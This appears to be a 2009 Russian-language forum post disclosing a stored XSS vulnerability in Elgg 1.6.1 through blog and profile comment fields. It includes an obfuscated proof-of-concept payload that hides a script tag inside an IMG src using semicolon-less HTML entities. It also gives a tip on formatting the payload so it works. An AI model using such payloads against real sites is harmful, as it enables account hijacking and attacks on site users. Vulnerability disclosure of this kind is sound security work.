07.11.2009, 08:07
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Elgg 1.6.1
Elgg 1.6.1
A social networking engine
Активная XSS
В модуле Блог.
В поле комментарии.
<IMG src=<script
>alert() ;
;</scrip&# x74;>>
</IMG>
В модуле Профиль.
В комментариях к любому профилю, тоже самое что упомянулось выше.
Данная уязвимость находиться везде, где можно ввести свои текстовые данные.
(HTML (without semicolons))
ps Уберите пробелы, значение src должно быть в одну строку.
|
|
|